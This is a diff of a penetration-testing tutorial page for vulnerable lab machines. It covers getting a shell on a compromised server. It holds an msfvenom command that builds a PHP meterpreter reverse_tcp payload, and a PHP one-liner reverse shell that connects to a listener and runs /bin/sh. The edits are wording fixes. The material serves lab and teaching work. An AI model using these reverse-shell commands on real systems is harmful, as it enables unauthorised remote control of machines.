vk12122/bitvijays.github.io-sphinx/docs/LFC-VulnerableMachines.rst

  We can create a php meterpreter shell, run a exploit handler on msf, upload the payload on the server and wait for the connection.

+**todo explain how to set up a multi handler**

  ::

   msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f raw -o /tmp/payload.php

 * **PHP Reverse Shell**

- PHP Trick: This code assumes that the TCP connection uses file descriptor 3.
+ The code below assumes that the TCP connection uses file descriptor 3.
 This worked on my test system.
 If it doesn’t work, try 4, 5, 6

  ::

   php -r '$sock=fsockopen("192.168.56.101",1337);exec("/bin/sh -i <&3 >&3 2>&3");'

- The above can be connected by listening at port 1337 by using nc
+ The above can be connected to by listening on port 1337 by using nc

 Weevely
 ^^^^^^^